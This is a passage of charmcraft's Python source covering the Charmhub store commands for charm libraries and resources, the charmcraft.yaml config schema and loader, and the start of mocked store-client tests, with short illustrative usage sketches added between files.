# show everything, grouped by tracks, with regular channels at first and
# branches (if any) after those
data = []
for track in all_tracks:
release_shown_for_this_track = False
shown_track = track
channels, branches = per_track[track]
for channel in channels:
description = channel.risk
                # get the release of the channel, falling back accordingly
release = releases_by_channel.get(channel.name)
if release is None:
version = revno = resources = (
"↑" if release_shown_for_this_track else "-"
)
else:
release_shown_for_this_track = True
revno = release.revision
revision = revisions_by_revno[revno]
version = revision.version
resources = self._build_resources_repr(release.resources)
datum = [shown_track, description, version, revno]
if resources_present:
datum.append(resources)
data.append(datum)
# stop showing the track name for the rest of the track
shown_track = ""
for branch in branches:
description = "/".join((branch.risk, branch.branch))
release = releases_by_channel[branch.name]
expiration = release.expires_at.isoformat()
revision = revisions_by_revno[release.revision]
datum = ["", description, revision.version, release.revision]
if resources_present:
datum.append(self._build_resources_repr(release.resources))
datum.append(expiration)
data.append(datum)
table = tabulate(data, headers=headers, tablefmt="plain", numalign="left")
for line in table.splitlines():
logger.info(line)
class _BadLibraryPathError(CommandError):
"""Subclass to provide a specific error for a bad library path."""
def __init__(self, path):
super().__init__(
"Charm library path {} must conform to lib/charms/<charm>/vN/<libname>.py"
"".format(path)
)
class _BadLibraryNameError(CommandError):
"""Subclass to provide a specific error for a bad library name."""
def __init__(self, name):
super().__init__(
"Charm library name {!r} must conform to charms.<charm>.vN.<libname>".format(
name
)
)
def _get_positive_int(raw_value):
"""Convert the raw value for api/patch into a positive integer."""
value = int(raw_value)
if value < 0:
raise ValueError("negative")
return value
def _get_lib_info(*, full_name=None, lib_path=None):
"""Get the whole lib info from the path/file.
This will perform mutation of the charm name to create importable paths.
* `charm_name` and `libdata.charm_name`: `foo-bar`
* `full_name` and `libdata.full_name`: `charms.foo_bar.v0.somelib`
* paths, including `libdata.path`: `lib/charms/foo_bar/v0/somelib`
"""
if full_name is None:
# get it from the lib_path
try:
libsdir, charmsdir, importable_charm_name, v_api = lib_path.parts[:-1]
except ValueError:
raise _BadLibraryPathError(lib_path)
if libsdir != "lib" or charmsdir != "charms" or lib_path.suffix != ".py":
raise _BadLibraryPathError(lib_path)
full_name = ".".join((charmsdir, importable_charm_name, v_api, lib_path.stem))
else:
# build the path! convert a lib name with dots to the full path, including lib
# dir and Python extension.
# e.g.: charms.mycharm.v4.foo -> lib/charms/mycharm/v4/foo.py
try:
charmsdir, importable_charm_name, v_api, libfile = full_name.split(".")
except ValueError:
raise _BadLibraryNameError(full_name)
if charmsdir != "charms":
raise _BadLibraryNameError(full_name)
path = pathlib.Path("lib")
lib_path = path / charmsdir / importable_charm_name / v_api / (libfile + ".py")
# charm names in the path can contain '_' to be importable
# these should be '-', so change them back
charm_name = create_charm_name_from_importable(importable_charm_name)
if v_api[0] != "v" or not v_api[1:].isdigit():
raise CommandError(
"The API version in the library path must be 'vN' where N is an integer."
)
api_from_path = int(v_api[1:])
lib_name = lib_path.stem
if not lib_path.exists():
return LibData(
lib_id=None,
api=api_from_path,
patch=-1,
content_hash=None,
content=None,
full_name=full_name,
path=lib_path,
lib_name=lib_name,
charm_name=charm_name,
)
# parse the file and extract metadata from it, while hashing
metadata_fields = (b"LIBAPI", b"LIBPATCH", b"LIBID")
metadata = dict.fromkeys(metadata_fields)
hasher = hashlib.sha256()
with lib_path.open("rb") as fh:
for line in fh:
if line.startswith(metadata_fields):
try:
field, value = [x.strip() for x in line.split(b"=")]
except ValueError:
raise CommandError(
"Bad metadata line in {}: {!r}".format(lib_path, line)
)
metadata[field] = value
else:
hasher.update(line)
missing = [k.decode("ascii") for k, v in metadata.items() if v is None]
if missing:
raise CommandError(
"Library {} is missing the mandatory metadata fields: {}.".format(
lib_path, ", ".join(sorted(missing))
)
)
bad_api_patch_msg = (
"Library {} metadata field {} is not zero or a positive integer."
)
try:
libapi = _get_positive_int(metadata[b"LIBAPI"])
except ValueError:
raise CommandError(bad_api_patch_msg.format(lib_path, "LIBAPI"))
try:
libpatch = _get_positive_int(metadata[b"LIBPATCH"])
except ValueError:
raise CommandError(bad_api_patch_msg.format(lib_path, "LIBPATCH"))
if libapi == 0 and libpatch == 0:
raise CommandError(
"Library {} metadata fields LIBAPI and LIBPATCH cannot both be zero.".format(
lib_path
)
)
if libapi != api_from_path:
raise CommandError(
"Library {} metadata field LIBAPI is different from the version in the path.".format(
lib_path
)
)
bad_libid_msg = "Library {} metadata field LIBID must be a non-empty ASCII string."
try:
libid = ast.literal_eval(metadata[b"LIBID"].decode("ascii"))
except (ValueError, UnicodeDecodeError):
raise CommandError(bad_libid_msg.format(lib_path))
if not libid or not isinstance(libid, str):
raise CommandError(bad_libid_msg.format(lib_path))
content_hash = hasher.hexdigest()
content = lib_path.read_text()
return LibData(
lib_id=libid,
api=libapi,
patch=libpatch,
content_hash=content_hash,
content=content,
full_name=full_name,
path=lib_path,
lib_name=lib_name,
charm_name=charm_name,
)
def _get_libs_from_tree(charm_name=None):
"""Get library info from the directories tree (for a specific charm if specified).
    It only follows/uses the directories/files of a correct charmlibs
    disk structure.
This can take charm_name as both importable and normal form.
"""
local_libs_data = []
if charm_name is None:
base_dir = pathlib.Path("lib") / "charms"
charm_dirs = sorted(base_dir.iterdir()) if base_dir.is_dir() else []
else:
importable_charm_name = create_importable_name(charm_name)
base_dir = pathlib.Path("lib") / "charms" / importable_charm_name
charm_dirs = [base_dir] if base_dir.is_dir() else []
for charm_dir in charm_dirs:
for v_dir in sorted(charm_dir.iterdir()):
if v_dir.is_dir() and v_dir.name[0] == "v" and v_dir.name[1:].isdigit():
for libfile in sorted(v_dir.glob("*.py")):
local_libs_data.append(_get_lib_info(lib_path=libfile))
found_libs = [lib_data.full_name for lib_data in local_libs_data]
logger.debug("Libraries found under %s: %s", base_dir, found_libs)
return local_libs_data
class CreateLibCommand(BaseCommand):
"""Create a charm library."""
name = "create-lib"
help_msg = "Create a charm library"
overview = textwrap.dedent(
"""
Create a charm library.
Charmcraft manages charm libraries, which are published by charmers
to help other charmers integrate their charms. This command creates
a new library in your charm which you are publishing for others.
This command MUST be run inside your charm directory with a valid
metadata.yaml. It will create the Python library with API version 0
initially:
lib/charms/<yourcharm>/v0/<name>.py
Each library has a unique identifier assigned by Charmhub that
supports accurate updates of libraries even if charms are renamed.
Charmcraft will request a unique ID from Charmhub and initialise a
template Python library.
Creating a charm library will take you through login if needed.
"""
)
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument("name", help="The name of the library file (e.g. 'db')")
def run(self, parsed_args):
"""Run the command."""
lib_name = parsed_args.name
valid_all_chars = set(string.ascii_lowercase + string.digits + "_")
valid_first_char = string.ascii_lowercase
if (
set(lib_name) - valid_all_chars
or not lib_name
or lib_name[0] not in valid_first_char
):
raise CommandError(
"Invalid library name. Must only use lowercase alphanumeric "
"characters and underscore, starting with alpha."
)
charm_name = get_name_from_metadata()
if charm_name is None:
raise CommandError(
"Cannot find a valid charm name in metadata.yaml. Check you are in a charm "
"directory with metadata.yaml."
)
# '-' is valid in charm names, but not in a python import
# mutate the name so the path is a valid import
importable_charm_name = create_importable_name(charm_name)
# all libraries born with API version 0
full_name = "charms.{}.v0.{}".format(importable_charm_name, lib_name)
lib_data = _get_lib_info(full_name=full_name)
lib_path = lib_data.path
if lib_path.exists():
raise CommandError("This library already exists: {}".format(lib_path))
store = Store(self.config.charmhub)
lib_id = store.create_library_id(charm_name, lib_name)
# create the new library file from the template
env = get_templates_environment("charmlibs")
template = env.get_template("new_library.py.j2")
context = dict(lib_id=lib_id)
try:
lib_path.parent.mkdir(parents=True, exist_ok=True)
lib_path.write_text(template.render(context))
except OSError as exc:
raise CommandError(
"Error writing the library in {}: {!r}.".format(lib_path, exc)
)
logger.info("Library %s created with id %s.", full_name, lib_id)
logger.info("Consider 'git add %s'.", lib_path)
class PublishLibCommand(BaseCommand):
"""Publish one or more charm libraries."""
name = "publish-lib"
help_msg = "Publish one or more charm libraries"
overview = textwrap.dedent(
"""
Publish charm libraries.
        Upload and release to Charmhub the new api/patch version of the
        indicated library, or of all the charm libraries if none is specified.
It will automatically take you through the login process if
your credentials are missing or too old.
"""
)
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument(
"library",
nargs="?",
help="Library to publish (e.g. charms.mycharm.v2.foo.); optional, default to all",
)
def run(self, parsed_args):
"""Run the command."""
charm_name = get_name_from_metadata()
if charm_name is None:
raise CommandError(
"Can't access name in 'metadata.yaml' file. The 'publish-lib' command needs to "
"be executed in a valid project's directory."
)
if parsed_args.library:
lib_data = _get_lib_info(full_name=parsed_args.library)
if not lib_data.path.exists():
raise CommandError(
"The specified library was not found at path {}.".format(
lib_data.path
)
)
if lib_data.charm_name != charm_name:
raise CommandError(
"The library {} does not belong to this charm {!r}.".format(
lib_data.full_name, charm_name
)
)
local_libs_data = [lib_data]
else:
local_libs_data = _get_libs_from_tree(charm_name)
# check if something needs to be done
store = Store(self.config.charmhub)
to_query = [dict(lib_id=lib.lib_id, api=lib.api) for lib in local_libs_data]
libs_tips = store.get_libraries_tips(to_query)
to_publish = []
for lib_data in local_libs_data:
logger.debug("Verifying local lib %s", lib_data)
tip = libs_tips.get((lib_data.lib_id, lib_data.api))
logger.debug("Store tip: %s", tip)
if tip is None:
                # the library needs to be published for the first time
to_publish.append(lib_data)
continue
if tip.patch > lib_data.patch:
# the store is more advanced than local
logger.info(
"Library %s is out-of-date locally, Charmhub has version %d.%d, please "
"fetch the updates before publishing.",
lib_data.full_name,
tip.api,
tip.patch,
)
elif tip.patch == lib_data.patch:
                # the store has the same version number as local
if tip.content_hash == lib_data.content_hash:
logger.info(
"Library %s is already updated in Charmhub.", lib_data.full_name
)
else:
# but shouldn't as hash is different!
logger.info(
"Library %s version %d.%d is the same than in Charmhub but content is "
"different",
lib_data.full_name,
tip.api,
tip.patch,
)
elif tip.patch + 1 == lib_data.patch:
# local is correctly incremented
if tip.content_hash == lib_data.content_hash:
# but shouldn't as hash is the same!
logger.info(
"Library %s LIBPATCH number was incorrectly incremented, Charmhub has the "
"same content in version %d.%d.",
lib_data.full_name,
tip.api,
tip.patch,
)
else:
to_publish.append(lib_data)
else:
logger.info(
"Library %s has a wrong LIBPATCH number, it's too high, Charmhub "
"highest version is %d.%d.",
lib_data.full_name,
tip.api,
tip.patch,
)
for lib_data in to_publish:
store.create_library_revision(
lib_data.charm_name,
lib_data.lib_id,
lib_data.api,
lib_data.patch,
lib_data.content,
lib_data.content_hash,
)
logger.info(
"Library %s sent to the store with version %d.%d",
lib_data.full_name,
lib_data.api,
lib_data.patch,
)
class FetchLibCommand(BaseCommand):
"""Fetch one or more charm libraries."""
name = "fetch-lib"
help_msg = "Fetch one or more charm libraries"
overview = textwrap.dedent(
"""
Fetch charm libraries.
        The first time a library is downloaded, the command will create the needed
        directories to place it; subsequent fetches will just update the local copy.
"""
)
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument(
"library",
nargs="?",
help="Library to fetch (e.g. charms.mycharm.v2.foo.); optional, default to all",
)
def run(self, parsed_args):
"""Run the command."""
if parsed_args.library:
local_libs_data = [_get_lib_info(full_name=parsed_args.library)]
else:
local_libs_data = _get_libs_from_tree()
# get tips from the Store
store = Store(self.config.charmhub)
to_query = []
for lib in local_libs_data:
if lib.lib_id is None:
item = dict(charm_name=lib.charm_name, lib_name=lib.lib_name)
else:
item = dict(lib_id=lib.lib_id)
item["api"] = lib.api
to_query.append(item)
libs_tips = store.get_libraries_tips(to_query)
# check if something needs to be done
to_fetch = []
for lib_data in local_libs_data:
logger.debug("Verifying local lib %s", lib_data)
# fix any missing lib id using the Store info
if lib_data.lib_id is None:
for tip in libs_tips.values():
if (
lib_data.charm_name == tip.charm_name
and lib_data.lib_name == tip.lib_name
):
lib_data = lib_data._replace(lib_id=tip.lib_id)
break
tip = libs_tips.get((lib_data.lib_id, lib_data.api))
logger.debug("Store tip: %s", tip)
if tip is None:
logger.info("Library %s not found in Charmhub.", lib_data.full_name)
continue
if tip.patch > lib_data.patch:
# the store has a higher version than local
to_fetch.append(lib_data)
elif tip.patch < lib_data.patch:
                # the store has a lower version number than local
logger.info(
"Library %s has local changes, can not be updated.",
lib_data.full_name,
)
else:
# same versions locally and in the store
if tip.content_hash == lib_data.content_hash:
logger.info(
"Library %s was already up to date in version %d.%d.",
lib_data.full_name,
tip.api,
tip.patch,
)
else:
logger.info(
"Library %s has local changes, can not be updated.",
lib_data.full_name,
)
for lib_data in to_fetch:
downloaded = store.get_library(
lib_data.charm_name, lib_data.lib_id, lib_data.api
)
if lib_data.content is None:
# locally new
lib_data.path.parent.mkdir(parents=True, exist_ok=True)
lib_data.path.write_text(downloaded.content)
logger.info(
"Library %s version %d.%d downloaded.",
lib_data.full_name,
downloaded.api,
downloaded.patch,
)
else:
# XXX Facundo 2020-12-17: manage the case where the library was renamed
# (related GH issue: #214)
lib_data.path.write_text(downloaded.content)
logger.info(
"Library %s updated to version %d.%d.",
lib_data.full_name,
downloaded.api,
downloaded.patch,
)
class ListLibCommand(BaseCommand):
"""List all libraries belonging to a charm."""
name = "list-lib"
help_msg = "List all libraries from a charm"
overview = textwrap.dedent(
"""
List all libraries from a charm.
For each library, it will show the name and the api and patch versions
for its tip.
"""
)
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument(
"name",
nargs="?",
help=(
"The name of the charm (optional, will get the name from"
"metadata.yaml if not given)"
),
)
def run(self, parsed_args):
"""Run the command."""
if parsed_args.name:
charm_name = parsed_args.name
else:
charm_name = get_name_from_metadata()
if charm_name is None:
raise CommandError(
"Can't access name in 'metadata.yaml' file. The 'list-lib' command must "
"either be executed from a valid project directory, or specify a charm "
"name using the --charm-name option."
)
# get tips from the Store
store = Store(self.config.charmhub)
to_query = [{"charm_name": charm_name}]
libs_tips = store.get_libraries_tips(to_query)
if not libs_tips:
logger.info("No libraries found for charm %s.", charm_name)
return
headers = ["Library name", "API", "Patch"]
data = sorted(
(item.lib_name, item.api, item.patch) for item in libs_tips.values()
)
table = tabulate(data, headers=headers, tablefmt="plain", numalign="left")
for line in table.splitlines():
logger.info(line)
class ListResourcesCommand(BaseCommand):
"""List the resources associated with a given charm in Charmhub."""
name = "resources"
help_msg = "List the resources associated with a given charm in Charmhub"
overview = textwrap.dedent(
"""
An overview of the resources associated with a given charm in Charmhub.
Listing resources will take you through login if needed.
"""
)
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument(
"charm_name", metavar="charm-name", help="The name of the charm"
)
def run(self, parsed_args):
"""Run the command."""
store = Store(self.config.charmhub)
result = store.list_resources(parsed_args.charm_name)
if not result:
logger.info("No resources associated to %s.", parsed_args.charm_name)
return
headers = ["Charm Rev", "Resource", "Type", "Optional"]
by_revision = {}
for item in result:
by_revision.setdefault(item.revision, []).append(item)
data = []
for revision, items in sorted(by_revision.items(), reverse=True):
initial, *rest = sorted(items, key=attrgetter("name"))
data.append(
(revision, initial.name, initial.resource_type, initial.optional)
)
data.extend(
("", item.name, item.resource_type, item.optional) for item in rest
)
table = tabulate(data, headers=headers, tablefmt="plain", numalign="left")
for line in table.splitlines():
logger.info(line)
class _BadOCIImageSpecError(CommandError):
"""Subclass to provide a specific error for a bad OCI Image specification."""
def __init__(self, base_error):
super().__init__(
base_error + " (the format is [organization/]name[:tag|@digest])."
)
def oci_image_spec(value):
"""Build a full OCI image spec, using defaults for non specified parts."""
# separate the organization
if "/" in value:
if value.count("/") > 1:
raise _BadOCIImageSpecError(
"The registry server cannot be specified as part of the image"
)
orga, value = value.split("/")
else:
orga = "library"
# get the digest XOR tag
if "@" in value and ":" in value:
raise _BadOCIImageSpecError("Cannot specify both tag and digest")
if "@" in value:
name, reference = value.split("@")
elif ":" in value:
name, reference = value.split(":")
else:
name = value
reference = "latest"
if not name:
raise _BadOCIImageSpecError("The image name is mandatory")
return OCIImageSpec(organization=orga, name=name, reference=reference)
class UploadResourceCommand(BaseCommand):
"""Upload a resource to Charmhub."""
name = "upload-resource"
help_msg = "Upload a resource to Charmhub"
overview = textwrap.dedent(
"""
Upload a resource to Charmhub.
        Push resource content to Charmhub, associating it with the
        specified charm. This charm needs to have the resource declared
        in its metadata (in a revision previously uploaded to Charmhub).
The resource can be a file from your computer (use the '--filepath'
option) or an OCI Image (use the '--image' option).
The OCI image description uses the [organization/]name[:tag|@digest]
        form. The name is mandatory, while organization and reference (a digest
        or a tag) are optional, defaulting to 'library' and 'latest'
        respectively.
Upload will take you through login if needed.
"""
)
common = True
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument(
"charm_name",
metavar="charm-name",
help="The charm name to associate the resource",
)
parser.add_argument(
"resource_name", metavar="resource-name", help="The resource name"
)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument(
"--filepath",
type=SingleOptionEnsurer(useful_filepath),
help="The file path of the resource content to upload",
)
group.add_argument(
"--image",
type=SingleOptionEnsurer(oci_image_spec),
help="The image specification with the [organization/]name[:tag|@digest] form",
)
def run(self, parsed_args):
"""Run the command."""
store = Store(self.config.charmhub)
if parsed_args.filepath:
resource_filepath = parsed_args.filepath
resource_filepath_is_temp = False
resource_type = ResourceType.file
logger.debug("Uploading resource directly from file %s", resource_filepath)
elif parsed_args.image:
logger.debug(
"Uploading resource from image %s at Dockerhub", parsed_args.image
)
ih = ImageHandler(parsed_args.image.organization, parsed_args.image.name)
final_resource_url = ih.get_destination_url(parsed_args.image.reference)
logger.debug("Resource URL: %s", final_resource_url)
resource_type = "oci-image"
# create a JSON pointing to the unique image URL (to be uploaded to Charmhub)
resource_metadata = {
"ImageName": final_resource_url,
}
_, tname = tempfile.mkstemp(prefix="image-resource", suffix=".json")
resource_filepath = pathlib.Path(tname)
resource_filepath_is_temp = True
resource_filepath.write_text(json.dumps(resource_metadata))
result = store.upload_resource(
parsed_args.charm_name,
parsed_args.resource_name,
resource_type,
resource_filepath,
)
# clean the filepath if needed
if resource_filepath_is_temp:
resource_filepath.unlink()
if result.ok:
logger.info(
"Revision %s created of resource %r for charm %r",
result.revision,
parsed_args.resource_name,
parsed_args.charm_name,
)
else:
logger.info("Upload failed with status %r:", result.status)
for error in result.errors:
logger.info("- %s: %s", error.code, error.message)
class ListResourceRevisionsCommand(BaseCommand):
"""List revisions for a resource of a charm."""
name = "resource-revisions"
help_msg = "List revisions for a resource associated to a charm in Charmhub"
overview = textwrap.dedent(
"""
Show size and date for each resource revision in Charmhub.
For example:
$ charmcraft resource-revisions my-charm my-resource
Revision Created at Size
1 2020-11-15 183151
Listing revisions will take you through login if needed.
"""
)
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument(
"charm_name",
metavar="charm-name",
help="The charm name to associate the resource",
)
parser.add_argument(
"resource_name", metavar="resource-name", help="The resource name"
)
def run(self, parsed_args):
"""Run the command."""
store = Store(self.config.charmhub)
result = store.list_resource_revisions(
parsed_args.charm_name, parsed_args.resource_name
)
if not result:
logger.info("No revisions found.")
return
headers = ["Revision", "Created at", "Size"]
custom_alignment = ["left", None, "right"]
result.sort(key=attrgetter("revision"), reverse=True)
data = [
(
item.revision,
item.created_at.strftime("%Y-%m-%d"),
naturalsize(item.size, gnu=True),
)
for item in result
]
table = tabulate(
data, headers=headers, tablefmt="plain", colalign=custom_alignment
)
for line in table.splitlines():
logger.info(line)
```
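A couple of the helpers above encode small naming conventions that are easier to see exercised than described. The sketch below is illustrative only: it assumes the module is importable as `charmcraft.commands.store`, and the charm and image names in it are made up.
```python
# Illustrative sketch (not part of the charmcraft sources): exercising the
# naming helpers defined above. The charm/image names are hypothetical.
from charmcraft.commands.store import (
    create_charm_name_from_importable,
    create_importable_name,
    oci_image_spec,
)

# '-' is valid in charm names but not in Python imports, so library paths
# use '_' and these two helpers translate back and forth.
assert create_importable_name("my-charm") == "my_charm"
assert create_charm_name_from_importable("my_charm") == "my-charm"

# OCI image specs default the organization to 'library' and the reference
# (tag or digest) to 'latest' when they are not given.
spec = oci_image_spec("ubuntu")
assert (spec.organization, spec.name, spec.reference) == ("library", "ubuntu", "latest")
spec = oci_image_spec("myorg/myimage:1.2")
assert (spec.organization, spec.name, spec.reference) == ("myorg", "myimage", "1.2")
```
The same charm-name translation is what `_get_lib_info` relies on when mapping `charms.<charm>.vN.<libname>` to `lib/charms/<charm>/vN/<libname>.py` and back.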
#### File: charmcraft/charmcraft/config.py
```python
import datetime
import pathlib
from urllib.parse import urlparse
import attr
import jsonschema
from charmcraft.cmdbase import CommandError
from charmcraft.utils import load_yaml
format_checker = jsonschema.FormatChecker()
# translator between "json" and pythonic yaml names
TYPE_TRANSLATOR = {
"object": "dict",
"array": "list",
}
def get_field_reference(path):
"""Get a field indicator from the received path."""
if isinstance(path[-1], int):
field = ".".join(list(path)[:-1])
ref = "item {} in '{}' field".format(path[-1], field)
else:
field = ".".join(path)
ref = "'{}' field".format(field)
return ref
def adapt_validation_error(error):
"""Take a jsonschema.ValidationError and create a proper CommandError."""
if error.validator == "required":
msg = "Bad charmcraft.yaml content; missing fields: {}.".format(
", ".join(error.validator_value)
)
elif error.validator == "type":
expected_type = TYPE_TRANSLATOR.get(
error.validator_value, error.validator_value
)
field_ref = get_field_reference(error.absolute_path)
msg = "Bad charmcraft.yaml content; the {} must be a {}: got '{}'.".format(
field_ref, expected_type, error.instance.__class__.__name__
)
elif error.validator == "enum":
field_ref = get_field_reference(error.absolute_path)
msg = "Bad charmcraft.yaml content; the {} must be one of: {}.".format(
field_ref, ", ".join(map(repr, error.validator_value))
)
elif error.validator == "format":
field_ref = get_field_reference(error.absolute_path)
msg = "Bad charmcraft.yaml content; the {} {}: got {!r}.".format(
field_ref, error.cause, error.instance
)
else:
# safe fallback
msg = error.message
raise CommandError(msg)
@format_checker.checks("url", raises=ValueError)
def check_url(value):
"""Check that the URL has at least scheme and net location."""
if isinstance(value, str):
url = urlparse(value)
if url.scheme and url.netloc:
return True
raise ValueError("must be a full URL (e.g. 'https://some.server.com')")
@format_checker.checks("relative_path", raises=ValueError)
def check_relative_paths(value):
"""Check that the received paths are all valid relative ones."""
if isinstance(value, str):
# check if it's an absolute path using POSIX's '/' (not os.path.sep, as the charm's
# config is independent of the platform where charmcraft is running)
if value and value[0] != "/":
return True
raise ValueError("must be a valid relative URL")
@attr.s(kw_only=True, frozen=True)
class CharmhubConfig:
"""Configuration for all Charmhub related options."""
api_url = attr.ib(default="https://api.charmhub.io")
storage_url = attr.ib(default="https://storage.snapcraftcontent.com")
@classmethod
def from_dict(cls, source):
"""Build from a raw dict."""
return cls(**source)
class BasicPrime(tuple):
"""Hold the list of files to include, specified under parts/bundle/prime configs.
    This is an intermediate structure until we have the full Lifecycle in place.
"""
@classmethod
def from_dict(cls, parts):
"""Build from a dicts sequence."""
prime = parts.get("bundle", {}).get("prime", [])
return cls(prime)
@attr.s(kw_only=True, frozen=True)
class Project:
"""Configuration for all project-related options, used internally."""
dirpath = attr.ib(default=None)
config_provided = attr.ib(default=None)
started_at = attr.ib(default=None)
@attr.s(kw_only=True, frozen=True)
class Config:
"""Root of all the configuration."""
charmhub = attr.ib(default={}, converter=CharmhubConfig.from_dict)
parts = attr.ib(default={}, converter=BasicPrime.from_dict)
type = attr.ib(default=None)
    # this item is provided by the code itself, not the user, as a convenience for
    # the rest of the code
project = attr.ib(default=None)
CONFIG_SCHEMA = {
"type": "object",
"properties": {
"type": {"type": "string", "enum": ["charm", "bundle"]},
"charmhub": {
"type": "object",
"properties": {
"api_url": {"type": "string", "format": "url"},
"storage_url": {"type": "string", "format": "url"},
},
"additionalProperties": False,
},
"parts": {
"type": "object",
"properties": {
"bundle": {
"type": "object",
"properties": {
"prime": {
"type": "array",
"items": {
"type": "string",
"format": "relative_path",
},
},
},
},
},
},
},
"required": ["type"],
"additionalProperties": False,
}
def load(dirpath):
"""Load the config from charmcraft.yaml in the indicated directory."""
if dirpath is None:
dirpath = pathlib.Path.cwd()
else:
dirpath = pathlib.Path(dirpath).expanduser().resolve()
content = load_yaml(dirpath / "charmcraft.yaml")
if content is None:
# configuration is mandatory only for some commands; when not provided, it will
        # be initialized with all defaults (but marked as not provided for later verification)
content = {}
config_provided = False
else:
# config provided! validate the loaded config is ok and mark as such
try:
jsonschema.validate(
instance=content, schema=CONFIG_SCHEMA, format_checker=format_checker
)
except jsonschema.ValidationError as exc:
adapt_validation_error(exc)
config_provided = True
# this timestamp will be used in several places, even sent to Charmhub: needs to be UTC
now = datetime.datetime.utcnow()
# inject project's config
content["project"] = Project(
dirpath=dirpath, config_provided=config_provided, started_at=now
)
return Config(**content)
```
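To make the schema above concrete, here is a rough sketch of how `load()` consumes a `charmcraft.yaml`; the project layout and URL are made up for illustration, and only the `type` key is actually required.
```python
# Illustrative sketch (not part of the charmcraft sources): loading a minimal,
# made-up charmcraft.yaml through config.load(). Only 'type' is mandatory.
import pathlib
import tempfile
import textwrap

from charmcraft import config

with tempfile.TemporaryDirectory() as tmp:
    project_dir = pathlib.Path(tmp)
    (project_dir / "charmcraft.yaml").write_text(
        textwrap.dedent(
            """
            type: charm
            charmhub:
              api_url: https://api.staging.example.com
            """
        )
    )
    cfg = config.load(project_dir)
    assert cfg.type == "charm"
    assert cfg.charmhub.api_url == "https://api.staging.example.com"
    # fields not present in the file keep their defaults
    assert cfg.charmhub.storage_url == "https://storage.snapcraftcontent.com"
    # the Project item is injected by load() itself, not read from the file
    assert cfg.project.config_provided is True
```
Unknown keys are rejected by `additionalProperties: False`, so a top-level typo such as `charmbub:` would surface as a "Bad charmcraft.yaml content" error rather than being silently ignored.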
#### File: tests/commands/test_store_api.py
```python
import logging
from unittest.mock import patch, call, MagicMock
import pytest
from dateutil import parser
from charmcraft.utils import ResourceOption
from charmcraft.commands.store.store import Store, Library
@pytest.fixture
def client_mock():
"""Fixture to provide a mocked client."""
client_mock = MagicMock()
with patch(
"charmcraft.commands.store.store.Client", lambda api, storage: client_mock
):
yield client_mock
# -- tests for client usage
def test_client_init(config):
"""Check that the client is initiated ok even without config."""
with patch("charmcraft.commands.store.store.Client") as client_mock:
Store(config.charmhub)
assert client_mock.mock_calls == [
call(config.charmhub.api_url, config.charmhub.storage_url),
]
# -- tests for auth
def test_login(client_mock, config):
"""Simple login case."""
store = Store(config.charmhub)
result = store.login()
assert client_mock.mock_calls == [
call.clear_credentials(),
call.get("/v1/whoami"),
]
assert result is None
def test_logout(client_mock, config):
"""Simple logout case."""
store = Store(config.charmhub)
result = store.logout()
assert client_mock.mock_calls == [
call.clear_credentials(),
]
assert result is None
def test_whoami(client_mock, config):
"""Simple whoami case."""
store = Store(config.charmhub)
auth_response = {"display-name": "<NAME>", "username": "jdoe", "id": "-1"}
client_mock.get.return_value = auth_response
result = store.whoami()
assert client_mock.mock_calls == [
call.get("/v1/whoami"),
]
assert result.name == "<NAME>"
assert result.username == "jdoe"
assert result.userid == "-1"
# -- tests for register and list names
def test_register_name(client_mock, config):
"""Simple register case."""
store = Store(config.charmhub)
result = store.register_name("testname", "stuff")
assert client_mock.mock_calls == [
call.post("/v1/charm", {"name": "testname", "type": "stuff"}),
]
assert result is None
def test_list_registered_names_empty(client_mock, config):
"""List registered names getting an empty response."""
store = Store(config.charmhub)
auth_response = {"results": []}
client_mock.get.return_value = auth_response
result = store.list_registered_names()
assert client_mock.mock_calls == [call.get("/v1/charm")]
assert result == []
def test_list_registered_names_multiple(client_mock, config):
"""List registered names getting a multiple response."""
store = Store(config.charmhub)
auth_response = {
"results": [
{"name": "name1", "type": "charm", "private": False, "status": "status1"},
{"name": "name2", "type": "bundle", "private": True, "status": "status2"},
]
}
client_mock.get.return_value = auth_response
result = store.list_registered_names()
assert client_mock.mock_calls == [call.get("/v1/charm")]
item1, item2 = result
assert item1.name == "name1"
assert item1.entity_type == "charm"
assert not item1.private
assert item1.status == "status1"
assert item2.name == "name2"
assert item2.entity_type == "bundle"
assert item2.private
assert item2.status == "status2"
# -- tests for the upload functionality (both for charm/bundles and resources)
def test_upload_straightforward(client_mock, caplog, config):
"""The full and successful upload case."""
caplog.set_level(logging.DEBUG, logger="charmcraft.commands")
store = Store(config.charmhub)
# the first response, for when pushing bytes
test_upload_id = "test-upload-id"
client_mock.push.return_value = test_upload_id
# the second response, for telling the store it was pushed
test_status_url = "https://store.c.c/status"
client_mock.post.return_value = {"status-url": test_status_url}
# the third response, status ok (note the patched UPLOAD_ENDING_STATUSES below)
test_revision = 123
test_status_ok = "test-status"
status_response = {
"revisions": [
{"status": test_status_ok, "revision": test_revision, "errors": None}
]
}
client_mock.get.return_value = status_response
test_status_resolution = "test-ok-or-not"
fake_statuses = {test_status_ok: test_status_resolution}
test_filepath = "test-filepath"
test_endpoint = "/v1/test/revisions/endpoint/"
with patch.dict(
"charmcraft.commands.store.store.UPLOAD_ENDING_STATUSES", fake_statuses
):
result = store._upload(test_endpoint, test_filepath)
# check all client calls
assert client_mock.mock_calls == [
call.push(test_filepath),
call.post(test_endpoint, {"upload-id": test_upload_id}),
call.get(test_status_url),
]
# check result (build after patched ending struct)
assert result.ok == test_status_resolution
assert result.status == test_status_ok
assert result.revision == test_revision
# check logs
expected = [
"Upload test-upload-id started, got status url https://store.c.c/status",
"Status checked: " + str(status_response),
]
assert expected == [rec.message for rec in caplog.records]
def test_upload_polls_status(client_mock, caplog, config):
"""Upload polls status url until the end is indicated."""
caplog.set_level(logging.DEBUG, logger="charmcraft.commands")
store = Store(config.charmhub)
    # first and second responses, for pushing bytes and letting the store know about it
test_upload_id = "test-upload-id"
client_mock.push.return_value = test_upload_id
test_status_url = "https://store.c.c/status"
client_mock.post.return_value = {"status-url": test_status_url}
    # the status-checking responses: two "not done yet" answers, then ok
test_revision = 123
test_status_ok = "test-status"
status_response_1 = {
"revisions": [{"status": "still-scanning", "revision": None, "errors": None}]
}
status_response_2 = {
